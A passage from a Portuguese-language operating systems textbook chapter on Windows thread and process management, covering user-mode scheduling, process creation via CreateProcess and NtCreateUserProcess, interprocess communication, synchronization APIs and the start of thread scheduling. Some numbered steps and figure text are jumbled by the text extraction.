como gerenciar os threads no pool da aplicação para o 
sistema operacional. 


O que os programadores identificam como um único 
thread do Windows, na realidade, são dois threads: um 
que é executado no modo núcleo e um no modo usuário. 
Esse é exatamente o mesmo modelo que o UNIX possui. 
Cada um recebe sua própria pilha e sua própria memória 
para salvar seus registradores quando não estiver em exe- 
cução. Os dois threads parecem ser um único porque não 
são executados ao mesmo tempo. O thread do usuário 
opera como uma extensão do thread do núcleo, rodando 
apenas quando o do núcleo chavear para ele, retornando 
do modo núcleo ao modo usuário. Quando um thread do 
usuário deseja realizar uma chamada do sistema, encon- 
tra uma falta de página ou é preemptado, o sistema entra 
no modo núcleo e retorna ao thread de núcleo correspon- 
dente. Em geral, não é possível chavear entre os threads 
do usuário sem primeiro chavear para o thread do núcleo 
correspondente, chavear para o novo thread do núcleo e 
depois chavear para o seu thread do usuário. 

Quase sempre a diferença entre os threads do usu- 
ário e do núcleo é transparente para o programador. 
Porém, no Windows 7, a Microsoft acrescentou um 
recurso chamado UMS (User-Mode Scheduling — 
escalonamento do modo usuário), que expõe essa dis- 
tinção. O UMS é semelhante aos recursos usados em 
outros sistemas operacionais, como as ativações de 
escalonador. Ele pode ser usado para alternar entre os 
threads do usuário sem primeiro ter de entrar no núcleo, 
oferecendo os benefícios dos filamentos, mas com uma 
integração muito melhor para o Win32 — pois utiliza 
threads Win32 reais. 

A implementação do UMS possui três elementos 
principais: 

1. Chaveamento em modo usuário: pode-se escrever 
um escalonador do modo usuário para chavear 
entre os threads do usuário sem entrar no núcleo. 
Quando ocorre de um thread do usuário entrar no 
modo núcleo, o UMS encontra o thread do núcleo 
correspondente e imediatamente chaveia para ele. 

2. Reentrada no escalonador do modo usuário: quan- 
do a execução de um thread do núcleo é bloquea- 
da para esperar que um recurso fique disponível, o 
UMS alterna para um thread do usuário especial e 
executa o escalonador do modo usuário, para que 
um thread diferente do usuário possa ser escalonado 
para execução no processador corrente. Isso permite 
que o processo corrente continue usando o mesmo 
processador por todo o seu período de tempo, em 
vez de ter de entrar na fila, atrás de outros proces- 
sos, quando um de seus threads estiver bloqueado. 


3. Término da chamada do sistema: depois que um 
thread do núcleo bloqueado por fim é conclui- 
do, uma notificação contendo os resultados das 
chamadas do sistema é enfileirada para o escalo- 
nador do modo usuário, de modo que ele possa 
alternar para o thread do usuário corresponden- 
te da próxima vez que tomar uma decisão de 
escalonamento. 


O UMS não inclui um escalonador do modo usuário 
como parte do Windows. Ele serve como um recurso 
de baixo nível para ser usado por bibliotecas de tempo 
de execução utilizadas por linguagens de programação 
e aplicações de servidor, para implementar modelos de 
threading leves, que não entram em conflito com o esca- 
lonamento de threads no nível de núcleo. Essas bibliote- 
cas de tempo de execução normalmente implementarão 
um escalonador do modo usuário mais adequado ao seu 
ambiente. Um resumo dessas abstrações pode ser visto 
na Figura 11.23. 


Threads 


Cada processo costuma começar com um thread, mas 
novos threads podem ser criados de maneira dinâmica. 
Os threads formam a base do escalonamento de CPU, 
já que o sistema operacional sempre seleciona um deles 
para ser executado, e não um processo. Como conse- 
quência, todo thread tem um estado (pronto, em execu- 
ção, bloqueado etc.), ao passo que os processos não têm 
estados de escalonamento. Os threads podem ser criados 
de maneira dinâmica por uma chamada do Win32 que 
especifica o endereço dentro do espaço de endereçamen- 
to do processo em que ele iniciará sua execução. 

Cada thread tem um identificador, que é obtido do 
mesmo espaço que os identificadores de processo; logo, 
um único ID nunca pode estar em uso para um processo 
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e um thread ao mesmo tempo. Os identificadores de 
thread e processo são múltiplos de quatro porque são, na 
verdade, alocados pelo executivo usando uma tabela de 
descritores especial posta à parte para a alocação de IDs. 
O sistema está reutilizando o mecanismo escalável de 
gerenciamento de descritores exibido nas figuras 11.16 
e 11.17. A tabela de descritores não tem referências em 
objetos, mas usa o campo de ponteiros para apontar para 
um processo ou thread para que a pesquisa de um ou 
outro por ID seja bastante eficiente. A ordenação FIFO 
da lista de descritores livres é ativada para a tabela de 
IDs em versões recentes do Windows, para que os IDs 
não sejam reutilizados de imediato. Os problemas com 
a reutilização imediata são explorados nas questões ao 
final deste capítulo. 

Um thread é executado em geral no modo usuário, 
mas quando ele faz uma chamada de sistema, muda 
para o modo núcleo e continua a ser executado como 
o mesmo thread com as mesmas propriedades e limi- 
tes que tinha no modo usuário. Cada thread tem duas 
pilhas, uma para usar quando está em modo usuário e 
outra para quando está no modo núcleo. Sempre que um 
thread entra no núcleo, ele muda para a pilha do modo 
núcleo. Os valores dos registradores do modo usuário 
são salvos em uma estrutura de dados CONTEXT na 
base da pilha do modo núcleo. Como a única forma de 
um thread de modo usuário não estar sendo executado 
é entrar no núcleo, a CONTEXT de um thread sempre 
contém o estado dos registradores quando ele não está 
sendo executado. A CONTEXT para cada thread pode 
ser examinada e modificada por qualquer processo com 
um descritor para o thread. 

Os threads normalmente são executados usando o 
token de acesso do processo que o contém, mas, em al- 
guns casos relacionados à computação cliente/servidor, 
um thread sendo executado em um processo de serviço 
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pode personificar seu cliente, usando um token de aces- 
so temporário baseado no token desse cliente para que 
o thread possa realizar operações no nome do cliente. 
(Em geral, um serviço não pode usar o token verdadeiro 
do cliente, já que o cliente e o servidor podem estar exe- 
cutando em sistemas diferentes.) 

Os threads também são o ponto focal normal para 
E/S. Eles bloqueiam quando realizam E/S síncrona e os 
pacotes de solicitação de E/S pendentes para E/S assín- 
crona são ligados a eles. Quando um thread termina sua 
execução, ele pode sair. Quaisquer solicitações de E/S 
pendentes para o thread serão canceladas e, quando o 
último thread ainda ativo em um processo sai, o proces- 
so é concluído. 

É importante perceber que os threads são um con- 
ceito de escalonamento, não um conceito de posse de 
recurso. Qualquer thread é capaz de acessar todos os ob- 
jetos que pertencem a seu processo. Tudo o que se tem 
de fazer é usar o valor de descritor e fazer a chamada 
Win32 apropriada. Não há restrições nos threads de que 
não possam acessar um objeto porque outro thread o 
criou ou abriu. O sistema nem mesmo mantém registro 
de qual thread criou qual objeto. Uma vez que o des- 
critor do objeto tenha sido colocado na tabela de des- 
critores do processo, qualquer thread no processo pode 
usá-lo, mesmo que esteja personificando outro usuário. 

Como já dissemos, além dos threads normais que 
são executados nos processos do usuário, o Windows 
tem uma série de threads de sistema que são executados 
apenas no modo núcleo e não são associados a qual- 
quer processo do usuário. Todos esses threads de siste- 
ma são executados em um processo especial, chamado 
processo de sistema. Esse processo não tem espaço de 
endereçamento no modo usuário. Ele fornece o ambien- 
te no qual os threads são executados quando não estão 
operando em nome de um processo específico do modo 
usuário. Estudaremos alguns desses threads posterior- 
mente, quando chegarmos ao gerenciamento de me- 
mória. Alguns realizam tarefas administrativas, como 
salvar páginas modificadas em disco, enquanto outros 
formam o pool de threads operários que são atribuídos 
para realizar tarefas curtas específicas, delegadas por 
componentes do executivo ou drivers que precisem rea- 
lizar algum serviço no processo de sistema. 


11.4.2 Chamadas API de gerenciamento de 
tarefas, processos, threads e filamentos 


Novos processos são criados usando a função da 
API do Win32 CreateProcess. Essa função tem muitos 


parâmetros e várias opções. Ela leva o nome do arquivo 
a ser executado, as strings de linhas de comando (não 
analisadas) e um ponteiro para as strings de ambien- 
te. Há também flags e valores que controlam muitos 
detalhes, como o modo que a segurança é configurada 
para o processo e o primeiro thread, configurações de 
depurador e propriedades de escalonamento. Um flag 
também especifica se descritores abertos no criador 
devem ser passados para o novo processo. A função 
também recebe o diretório de funcionamento atual do 
novo processo e uma estrutura de dados opcional, com 
informações sobre a GUI do Windows que o processo 
deverá usar. Em vez de retornar apenas um ID para o 
novo processo, o Win32 retorna descritores e IDs, tanto 
para o novo processo quanto para seu thread inicial. 

O grande número de parâmetros revela uma série de 
diferenças do processo de criação no UNIX, 


1. O caminho de pesquisa real para encontrar o pro- 
grama a ser executado está embutido no código 
de biblioteca para o Win32, mas gerenciado de 
forma mais explícita no UNIX. 

2. O diretório de trabalho atual é um conceito do 
modo núcleo no UNIX, mas uma string do modo 
usuário no Windows. O Windows na verdade abre 
um descritor no diretório atual de cada processo, 
com os mesmos efeitos irritantes do UNIX: não 
se pode apagar o diretório, a não ser que aconte- 
ça de ele estar em outro ponto da rede, podendo, 
nesse caso, ser apagado. 

3. O UNIX analisa a linha de comando e passa um 
vetor de parâmetros, enquanto o Win32 deixa a 
análise de argumentos para o programa indivi- 
dual. Como consequência, programas diferentes 
podem tratar caracteres curinga (por exemplo, 
* txt) e outros símbolos especiais de um modo 
inconsistente. 

4. Se os descritores de arquivos podem ou não ser 
herdados no UNIX é uma propriedade do descri- 
tor. No Windows, essa é uma propriedade tanto 
do descritor quanto do parâmetro para a criação 
do processo. 

5. O Win32 é orientado por GUI; logo, novos pro- 
cessos recebem, de forma direta, informações 
sobre sua janela primária, ao passo que essa in- 
formação é passada como parâmetros para apli- 
cações de GUI no UNIX. 

6. O Windows não tem um bit SETUID como 
uma propriedade do executável, mas um pro- 
cesso pode criar outro que seja executado como 
um usuário diferente, desde que possa obter um 
token com as credenciais daquele usuário. 


7. O descritor de processo e de thread retornado pelo 
Windows pode ser usado para modificar o novo 
processo/thread de várias formas significativas, 
incluindo modificação da memória virtual, inje- 
ção de threads no processo e alteração da execu- 
ção de threads. O UNIX apenas faz modificações 
ao novo processo entre as chamadas fork e exec, 
e apenas de formas limitadas, pois exec descarta 
todo o estado do modo usuário do processo. 


Algumas dessas diferenças são históricas e filosó- 
ficas. O UNIX foi projetado para ser orientado à linha 
de comando em vez de ser orientado à GUI, como o 
Windows. Os usuários do UNIX são mais sofisticados e 
entendem conceitos como variáveis PATH. O Windows 
herdou muito do legado do MS-DOS. 

A comparação também é distorcida porque o Win32 
é um invólucro do modo usuário em torno da execu- 
ção nativa de processos do NT, assim como as funções 
da biblioteca system envolvem fork/exec no UNIX. As 
chamadas de sistema reais do NT para criar processos e 
threads, NtCreateProcess e NtCreateThread, são muito 
mais simples do que as versões do Win32. Os parâme- 
tros principais de criação de processos do NT são um 
descritor em uma seção representando o arquivo de pro- 
grama a ser executado, um flag especificando se o novo 
processo deve, por padrão, herdar descritores do cria- 
dor e parâmetros relacionados ao modelo de segurança. 
Todos os detalhes de configuração das strings de am- 
biente, e a criação do thread inicial, são deixados para 
o código do modo usuário, que pode usar o descritor no 
novo processo para manipular diretamente seu espaço 
de endereçamento virtual. 

Para dar suporte ao subsistema POSIX, a criação 
nativa de processos tem uma opção de criar um novo 
processo copiando o espaço de endereçamento virtual 
de outro em vez de mapear um objeto de seção para 
um programa novo. Isso só é usado para implementar 
a fork para o POSIX, e não pelo Win32. Como POSIX 
não vem mais com o Windows, a duplicação de pro- 
cessos tem pouca utilidade — ainda que, às vezes, os 
desenvolvedores ousados apareçam com usos especiais, 
semelhante aos usos de fork sem exec no UNIX. 

A criação de threads passa o contexto da CPU para 
ser usado pelo novo thread (o que inclui o ponteiro 
de pilha e o ponteiro de instrução inicial), um modelo 
(template) para o TEB e um flag dizendo se o thread 
deve ser executado de imediato ou criado em um es- 
tado de suspensão (esperando alguém chamar NtRe- 
sumeThread em seu descritor). A criação da pilha do 
modo usuário e a passagem dos parâmetros argv/argc 
são deixadas para o código do modo usuário chamando 
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as APIs nativas de gerenciamento de memória do NT 
no descritor do processo. 

No lançamento do Windows Vista, uma nova API 
nativa para processos foi incluída, NtCreateUserPro- 
cess, movendo muitas das etapas do modo usuário para 
o executivo no modo núcleo, combinando a criação de 
processos com a criação do thread inicial. A razão para a 
mudança foi dar suporte ao uso de processos como limi- 
tes de segurança. Em geral, todos os processos criados 
por um usuário são considerados igualmente confiá- 
veis. É o usuário, representado por um token, que de- 
termina onde está o limite de confiança. NtCreateUser 
Process permite que os processos também ofereçam 
limites de confiança, mas isso significa que o proces- 
so criador não possui direitos suficientes em relação a 
um novo descritor de processo para implementar os de- 
talhes da criação no modo usuário para processos que 
estão em um ambiente de confiança diferente. O prin- 
cipal uso de um processo em um limite de confiança 
diferente (considerados processos protegidos) é dar 
suporte a diversas formas de gerenciamento de direitos 
digitais, que protegem o material com direitos autorais 
de ser usado indevidamente. Logicamente, os processos 
protegidos só visam a ataques do modo usuário contra 
o conteúdo protegido, e não podem impedir ataques do 
modo núcleo. 


Comunicação entre processos 


Os threads podem se comunicar de muitas maneiras, 
entre elas pipes, pipes nomeados, mailslots, soquetes, 
chamadas de procedimento remotas e arquivos compar- 
tilhados. Os pipes têm dois modos: bytes e mensagens, 
selecionados no momento da criação. Os pipes no modo 
byte funcionam como no UNIX. Os pipes no modo de 
mensagem são bastante parecidos, mas preservam os li- 
mites da mensagem; assim, quatro escritas de 128 bytes 
serão lidas como quatro mensagens de 128 bytes, e não 
como uma mensagem de 512 bytes, como acontece com 
os pipes no modo byte. Existem também os pipes nome- 
ados e que têm os mesmos dois modos dos normais. Os 
pipes nomeados também podem ser usados em rede; os 
normais, não. 

Os mailslots são uma caracteristica do sistema ope- 
racional OS/2 implementada no Windows por questão 
de compatibilidade. De certa maneira, são similares 
aos pipes, mas não idênticos. Uma diferença: eles são 
de apenas uma via, enquanto os pipes são de via du- 
pla. Também podem ser usados em uma rede, mas não 
dão garantia de entrega. Por fim, permitem que o pro- 
cesso emissor difunda uma mensagem para diversos 
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receptores, em vez de para apenas um. Tanto os mail- 
slots quanto os pipes nomeados sao implementados 
como sistemas de arquivos no Windows, em vez de 
funções do executivo. Isso permite que sejam acessados 
pela rede usando-se os protocolos remotos de sistema 
de arquivos existentes. 

Os soquetes são como os pipes, só que em geral co- 
nectam processos em máquinas diferentes. Por exem- 
plo, um processo escreve em um soquete e outro, em 
uma máquina remota, lê a partir desse soquete. Os so- 
quetes também podem ser usados para conectar pro- 
cessos de uma mesma máquina, mas, como ocasionam 
maior sobrecarga que os pipes, eles em geral são usa- 
dos somente no contexto de redes. Os soquetes foram 
projetados, no início, para o Berkeley UNIX, e a im- 
plementação obteve ampla disponibilidade. Alguns dos 
códigos e estruturas de dados do Berkeley ainda estão 
presentes no Windows, como reconhecido nas notas de 
lançamento do sistema. 

As RPCs (Remote Procedure Calls — Chamadas 
de procedimento remotas) permitem que um processo 4 
faça com que um processo B chame um procedimento 
no espaço de endereçamento de B a pedido de 4 e re- 
torne o resultado para 4. Existem várias restrições aos 
parâmetros. Por exemplo, não faz sentido passar um 
ponteiro para um processo diferente, portanto as estru- 
turas de dados devem ser postas em pacotes e transmi- 
tidas de uma forma independente do processo. A RPC 
é de modo geral implementada como uma camada de 
abstração acima da camada de transporte. No caso do 
Windows, o transporte pode ser soquetes TPC/IP, pipes 
nomeados ou ALPC. A ALPC (Advanced Local Pro- 
cedure Call — Chamada avançada de procedimento 
local) é um recurso de envio de mensagem no execu- 
tivo do modo núcleo. É otimizada para comunicações 
entre processos na máquina local e não opera em rede. 
O projeto básico é o envio de mensagens que geram 
respostas, implementando uma versão leve de chamada 
de procedimento remota, sobre a qual o pacote de RPC 
pode ser construído para fornecer um conjunto mais 
rico em funcionalidade do que o disponível na ALPC. 
Esta é implementada usando uma combinação de cópia 
de parâmetros e alocação temporária de memória com- 
partilhada, baseada no tamanho das mensagens. 

Por fim, os processos podem compartilhar objetos. 
Isso inclui objetos de seção, que podem ser mapeados 
no espaço de endereçamento virtual de processos di- 
ferentes ao mesmo tempo. Todas as escritas feitas por 
um processo aparecem, então, no espaço de endere- 
çamento dos outros processos. Usando esse mecanis- 
mo, o buffer compartilhado utilizado em problemas 


produtor-consumidor pode ser implementado de for- 
ma fácil. 


Sincronização 


Os processos também podem usar vários tipos de 
objetos de sincronização. Assim como o Windows for- 
nece numerosos mecanismos de comunicação entre 
processos, ele também oferece vários mecanismos de 
sincronização, incluindo semáforos, mutexes, regiões 
críticas e eventos. Todos esses mecanismos funcionam 
com os threads e não com os processos; assim, quando 
um thread é bloqueado em um semáforo, outros threads 
no mesmo processo (se houver algum) não são afetados 
e podem continuar sua execução. 

Um semáforo é criado usando a função CreateSe- 
maphore da API do Win32, que pode inicializá-lo para 
um valor dado e definir um valor maximo também. Os 
semáforos são objetos do modo núcleo e, por essa ra- 
zão, têm descritores de segurança e descritores comuns. 
O descritor de um semáforo pode ser duplicado usan- 
do DuplicateHandle e passado para outro processo de 
modo que vários processos possam ser sincronizados 
pelo mesmo semáforo. Um semáforo também pode re- 
ceber um nome no espaço de nomes do Win32 e ter uma 
ACL configurada para sua proteção. Algumas vezes 
compartilhar um semáforo pelo nome é mais apropriado 
que duplicar o descritor. 

Existem chamadas para up e down, contudo elas têm 
nomes um pouco estranhos, ReleaseSemaphore (up) e 
WaitForSingleObject (down). Também é possível defi- 
nir um tempo limite para que a chamada WaitForSingle- 
Object expire, para que o thread que a esteja realizando 
possa ser liberado finalmente, ainda que o semáforo 
permaneça em 0 (embora temporizadores reintroduzam 
as condições de corrida). As chamadas WaitForSingle- 
Object e WaitForMultipleObjects são as interfaces co- 
muns usadas para esperar pelos objetos despachantes 
discutidos na Seção 11.3. Ainda que tivesse sido possi- 
vel envolver a versão de um único objeto dessas APIs 
em um invólucro com um nome de alguma forma mais 
parecido com um semáforo, muitos threads usam a ver- 
são de muitos objetos, que pode incluir a espera por 
várias formas de objetos de sincronização, bem como 
outros eventos como finalização de processos e threads, 
conclusão de operações de E/S e a disponibilidade de 
mensagens em portas e soquetes. 

Os mutexes também são objetos do modo núcleo 
usados para sincronização, contudo mais simples 
que os semáforos porque não têm contadores. Eles 
são, na essência, travas com funções API para travar, 


WaitForSingleObject, e destravar, ReleaseMutex. As- 
sim como os descritores de semáforos, os descritores 
de mutexes podem ser duplicados e passados entre pro- 
cessos para que threads em processos diferentes possam 
acessar o mesmo mutex. 

Um terceiro mecanismo de sincronização é chama- 
do de seções críticas, que implementam o conceito de 
regiões críticas. Elas são similares aos mutexes no Win- 
dows, com a diferença de que são locais para o espaço 
de endereçamento do thread criador. Como as seções 
críticas não são objetos do modo núcleo, elas não têm 
descritores explícitos ou descritores de segurança e não 
podem ser passadas entre processos. A ativação e a li- 
beração da trava são feitas com EnterCriticalSection e 
LeaveCriticalSection, respectivamente. Como essas 
funções da API são realizadas, de início, no espaço do 
usuário e só fazem chamadas ao núcleo quando um blo- 
queio é necessário, elas são muito mais rápidas que os 
mutexes. As seções críticas são otimizadas para com- 
binar travas giratórias (em multiprocessadores) com o 
uso de sincronização de núcleo apenas quando neces- 
sário. Em muitas aplicações a maior parte das seções 
críticas é tão raramente disputada ou existe por períodos 
tão curtos que nunca é necessário alocar um objeto de 
sincronização do núcleo. Isso resulta em economias sig- 
nificativas de memória do núcleo. 

Outro mecanismo de sincronização que discuti- 
mos usa objetos do modo núcleo chamados de even- 
tos. Como já descrevemos, há dois tipos: eventos de 
notificação e eventos de sincronização. Um evento 
pode estar em um de dois estados: sinalizado e não si- 
nalizado. Um thread pode esperar para um evento ser 
sinalizado com a chamada WaitForSingleObject. Se 
um outro thread sinaliza um evento com a chamada 
SetEvent, o que acontece depende do tipo do evento. 
Com um evento de notificação, todos os threads em 
espera são liberados e o evento permanece marcado 
até que seja desmarcado, de forma manual, com Re- 
setEvent. Com um evento de sincronização, se um 
ou mais threads estiverem aguardando, apenas um é 
liberado e o evento é desmarcado. Uma operação al- 
ternativa é PulseEvent, que é como SetEvent, com a 
diferença de que, se não houver ninguém aguardan- 
do, o pulso é perdido e o evento é desmarcado. Por 
outro lado, um SetEvent que aconteça sem que haja 
threads esperando é lembrado por deixar o evento si- 
nalizado, de modo que um thread subsequente que 
faça uma chamada API de espera para o evento não 
esperará na verdade. 

O número de chamadas API do Win32 lidando com 
processos, threads e filamentos é próximo de 100, e 
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uma parte substancial disso lida com IPC de uma forma 
ou de outra. 

Duas novas funções de sincronização foram adi- 
cionadas recentemente ao Windows, WaitOnAddress 
e InitOnceExecuteOnce. A primeira é chamada para 
esperar que o valor contido no endereço especificado 
seja modificado. A aplicação deverá chamar WakeByA- 
ddressSingle (ou WakeByAddressAll) depois de mo- 
dificar o local para despertar o primeiro dos (ou todos 
os) threads que chamaram WaitOnAddress nesse local. 
A vantagem dessa API em relação ao uso de eventos é 
que não é preciso alocar um evento explícito para sin- 
cronização. Em vez disso, o sistema esmiúça o ende- 
reço do local para encontrar uma lista de todos os que 
estão esperando mudanças em determinado endereço. 
WaitOnAddress funciona de modo semelhante ao me- 
canismo de dormir/despertar encontrado no núcleo do 
UNIX. A função InitOnceExecuteOnce pode ser usada 
para garantir que uma rotina de inicialização seja execu- 
tada apenas uma vez em um programa. A inicialização 
correta de estruturas de dados é incrivelmente difícil em 
programas multithreaded. Um resumo das chamadas 
discutidas anteriormente, bem como de outras impor- 
tantes, é apresentado na Figura 11.24. 

Note que nem todas essas são apenas chamadas de 
sistema. Enquanto algumas são invólucros, outras con- 
têm código significativo de bibliotecas que mapeia a 
semântica do Win32 para as APIs nativas do NT. Além 
dessas, outras, como as APIs de filamentos, são pura- 
mente funções do modo usuário porque, como já dis- 
semos, o modo núcleo não conhece os filamentos. Eles 
são implementados, em sua totalidade, por bibliotecas 
do modo usuário. 


11.4.3 Implementação de processos e threads 


Nesta seção entraremos em mais detalhes sobre como 
o Windows cria um processo (e o thread inicial). Como 
Win32 é a interface mais documentada, começaremos 
com ele, mas chegaremos de forma rápida ao núcleo 
e entenderemos a implementação da chamada de API 
nativa para a criação de um novo processo. Focaremos 
os caminhos principais de código que são executados 
sempre que os processos são criados e apresentaremos 
alguns dos detalhes que completam lacunas no que vi- 
mos até aqui. 

Um processo é criado quando outro processo realiza 
a chamada CreateProcess do Win32. Essa chamada in- 
voca um procedimento do modo usuário na kernel32. dll 
que faz uma chamada a NtCreateUserProcess no nú- 
cleo para criar o processo em diversas etapas. 
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[FIGURA 11.24] Algumas das chamadas do Win32 para gerenciar processos, threads e filamentos. 





Função da API do Win32 


Descrição 















































CreateProcess Cria um novo processo 

CreateThread Cria um novo thread em um processo existente 

CreateFiber Cria um novo filamento 

ExitProcess Finaliza o processo atual e todos os seus threads 

ExitThread Finaliza este thread 

ExitFiber Finaliza este filamento 

SwitchToFiber Executa um filamento diferente no thread atual 

SetPriorityClass Configura a classe de prioridade de um processo 
SetThreadPriority Configura a prioridade de um thread 

CreateSemaphore Cria um novo semáforo 

CreateMutex Cria um novo mutex 

OpenSemaphore Abre um semáforo existente 

OpenMutex Abre um mutex existente 

WaitForSingleObject Bloqueia em espera por um Unico semaforo, mutex etc. 
WaitForMultipleObjects Bloqueia em espera por um conjunto de objetos cujos descritores foram fornecidos 
PulseEvent Configura um evento como sinalizado, depois como nao sinalizado 





ReleaseMutex 


Libera um mutex para que outro thread possa utiliza-lo 





ReleaseSemaphore 


Aumenta o contador do semáforo em 1 





EnterCriticalSection 


Obtém a trava em uma seção crítica 





LeaveCriticalSection 


Libera a trava em uma seção crítica 





WaitOnAddress 


Bloqueia até que a memória no endereço especificado seja alterada 





WakeByAddressSingle 


Acorda o primeiro thread aguardando neste endereço 





WakeByAddressAll 


Acorda todos os threads que estão aguardando neste endereço 





InitOnceExecuteOnce 








Garante que uma rotina de inicialização seja executada apenas uma vez 








como parâmetro de um caminho do Win32 para 
um caminho do NT. Se o executável tem apenas 
um nome sem um nome de diretório, ele é pes- 
quisado nos diretórios listados nos diretórios- 
-padrão (que incluem — mas não são limitados 
a — aqueles na variável PATH no ambiente). 
Empacota os parâmetros da criação do proces- 
so e os entrega, com o caminho completo do 
programa executável, para a chamada API na- 
tiva NtCreateUserProcess. 

Sendo executada no modo núcleo, a NtCrea- 
teUserProcess processa os parâmetros e então 
abre a imagem do programa e cria um obje- 
to de seção que pode ser usado para mapear o 
programa no espaço de endereçamento virtual 
do novo processo. 


1. Converte o nome do arquivo executável dado 4. O gerenciador de processos aloca e inicializa 


o objeto de processos (a estrutura de dados do 
núcleo que representa um processo para as ca- 
madas do núcleo e executiva). 

O gerenciador de memória cria o espaço de en- 
dereçamento para o novo processo alocando e 
inicializando os diretórios de página e os descri- 
tores de endereço virtual que descrevem a parte 
do modo núcleo, incluindo as regiões específicas 
de processos, como as entradas do diretório de 
páginas de automapeamento que dá a cada pro- 
cesso acesso no modo núcleo às páginas físicas 
de toda a sua tabela de páginas usando endereços 
virtuais do núcleo. (Descreveremos o automape- 
amento em mais detalhes na Seção 11.5.) 

Uma tabela de descritores é criada para o novo 
processo, e todos os descritores do chamador 


10. 


11. 


12. 


13. 


14. 


15. 


que são possíveis de serem herdados são co- 
piados para ela. 

A página do usuário compartilhada é mapeada, 
e o gerenciador de memória inicializa as estru- 
turas de dados do conjunto de trabalho usadas 
para decidir quais páginas devem ser aparadas 
de um processo quando a memória física esti- 
ver baixa. Os pedaços da imagem executável 
representada pelo objeto de seção são mapea- 
dos para o espaço de endereçamento do modo 
usuário do novo processo. 

O executivo cria e inicializa o bloco do am- 
biente do processo (PEB — Process Envi- 
ronment Block), que é usado tanto pelo modo 
usuário quanto pelo modo núcleo para manter 
informações de estado por todo o processo, 
como os ponteiros de heap do modo usuário e 
a lista de bibliotecas carregadas (DLLs). 

A memória virtual é alocada no novo processo 
e usada para passar parâmetros, incluindo as 
strings de ambiente e a linha de comandos. 
Um ID de processo é alocado da tabela espe- 
cial de descritores (tabela de ID) que o núcleo 
mantém para alocar de forma eficiente IDs lo- 
cais únicos para processos e threads. 

Um objeto de thread é alocado e inicializado. 
Uma pilha do modo usuário é alocada com o 
bloco de ambiente de thread (TEB — Thread 
Environment Block). O registro CONTEXT 
que contém os valores iniciais do thread para 
os registradores da CPU (incluindo os pontei- 
ros de instrução e pilha) é inicializado. 

O objeto de processo é adicionado à lista glo- 
bal de processos. Descritores para os objetos 
de processo e threads são alocados na tabela de 
descritores do chamador. Um ID para o thread 
inicial é alocado da tabela de IDs. 
NtCreateUserProcess retorna ao modo usuário 
com o novo processo criado, contendo um único 
thread pronto para ser executado, mas suspenso. 
Se a API do NT falha, o código do Win32 ve- 
rifica se esse pode ser um processo pertencente 
a outro subsistema como WOW64, ou talvez o 
programa seja marcado para ser executado sob 
o depurador. Esses casos especiais são tratados 
com codificação especial no código de Create- 
Process no modo usuário. 

Se a chamada NtCreateUserProcess foi bem- 
-sucedida, ainda há algum trabalho a ser feito. 
Os processos do Win32 devem ser registra- 
dos com o processo de subsistema do Win32, 
csrss.exe. A biblioteca Kernel32.dll envia uma 
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mensagem para o csrss falando sobre o novo 
processo, junto com os descritores do proces- 
so e do thread, para que ele possa se duplicar. 
O processo e os threads são incluídos nas tabe- 
las dos subsistemas para que eles tenham uma 
lista completa de todos os processos e threads 
do Win32. O subsistema então exibe um cursor 
contendo um ponteiro com uma ampulheta para 
dizer ao usuário que alguma coisa está ocorren- 
do, mas que o cursor pode ser usado enquanto 
isso. Quando o processo faz sua primeira cha- 
mada de GUI, geralmente para criar uma janela, 
o cursor é removido (ele expira depois de dois 
segundos se nenhuma chamada for recebida). 

16. Se o processo é restrito, como um Internet Ex- 
plorer de baixos direitos, o token é modificado 
para restringir quais objetos o novo processo 
pode acessar. 

17. Se a aplicação foi marcada como precisando 
ser adaptada para executar em compatibilidade 
com a versão atual do Windows, as adapta- 
ções especificadas são aplicadas. Adaptações 
(shims) de modo geral envolvem chamadas 
de biblioteca para modificar ligeiramente seu 
comportamento, como retornar um número de 
versão falso ou atrasar a liberação de memória. 

18. Por fim, chama a NtResumeThread para tirar o 
thread da suspensão e retorna a estrutura para o 
chamador contendo os IDs e os descritores para o 
processo e o thread que acabaram de ser criados. 


Em versões anteriores do Windows, grande parte do 
algoritmo para a criação de processos era implementada 
no procedimento do modo usuário que criaria um novo 
processo usando diversas chamadas do sistema e reali- 
zando outro trabalho por meio das APIs nativas do NT, 
que dão suporte à implementação de subsistemas. Essas 
etapas foram passadas para o núcleo, reduzindo assim a 
capacidade do processo pai de manipular os processos 
filhos nos casos em que o filho está executando um pro- 
grama protegido, como o que implementa DRM para 
proteger a pirataria de filmes. 

A API nativa original, NtCreateProcess, ainda é 
aceita pelo sistema; assim, grande parte do processo de 
criação ainda poderia ser feita dentro do modo usuário 
do processo pai — desde que o processo sendo criado 
não seja protegido. 


Escalonamento 


O núcleo do Windows não tem um thread de escalo- 
namento central. Em vez disso, quando um thread não 
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pode mais executar, ele entra no modo núcleo e executa 
o escalonador para verificar para qual thread deverá al- 
ternar. As condições a seguir causam o escalonamento. 


1. O thread atualmente em execução é bloqueado 
diante de um semáforo, mutex, evento, E/S etc. 

2. Ele sinaliza um objeto (por exemplo, faz um up 
em um semáforo). 

3. O quantum do thread expira. 


No caso 1, o thread já está executando no modo nú- 
cleo para realizar a operação no despachante ou obje- 
to de E/S. Como provavelmente não poderá continuar 
executando, ele executa o código do escalonador para 
que escolha seu sucessor e carregue CONTEXT para re- 
tomar sua execução. 

No caso 2, o thread em execução também está no 
modo núcleo. Contudo, depois de sinalizar algum ob- 
jeto, certamente ele pode prosseguir, pois o ato de si- 
nalizar um objeto nunca gera bloqueios. Ainda assim, 
o thread precisa executar o escalonador e verificar se o 
resultado de sua ação liberou um thread de prioridade 
mais alta e que esteja, agora, pronto para executar. Se 
isso acontecer, ocorrerá uma alternância de thread, pois 
o Windows é completamente preemptivo (isto é, o cha- 
veamento de threads pode ocorrer a qualquer momento, 
não apenas no fim do quantum do thread em execução). 
Entretanto, no caso de um chip com múltiplos núcleos 
ou um multiprocessador, um thread que tenha ficado 
pronto pode ser escalonado em uma CPU diferente e o 
thread original pode continuar sendo executado na CPU 
atual, mesmo tendo prioridade inferior. 

No caso 3, ocorre uma interrupção para o modo 
núcleo; nesse momento, o thread executa o código do 
escalonador para verificar quem é o próximo a exe- 
cutar. Dependendo de quais sejam os outros threads 
que estejam esperando, o mesmo thread pode ser se- 
lecionado e, desse modo, obter um novo quantum e 
continuar executando. Caso contrário, ocorre uma al- 
ternância de thread. 

O escalonador também é chamado em outras duas 
condições: 


1. Uma operação de E/S é concluída. 
2. Uma espera temporizada expira. 


No primeiro caso, um thread pode estar esperando 
uma operação de E/S e então ser liberado para executar. 
É preciso verificar se esse thread deveria causar pre- 
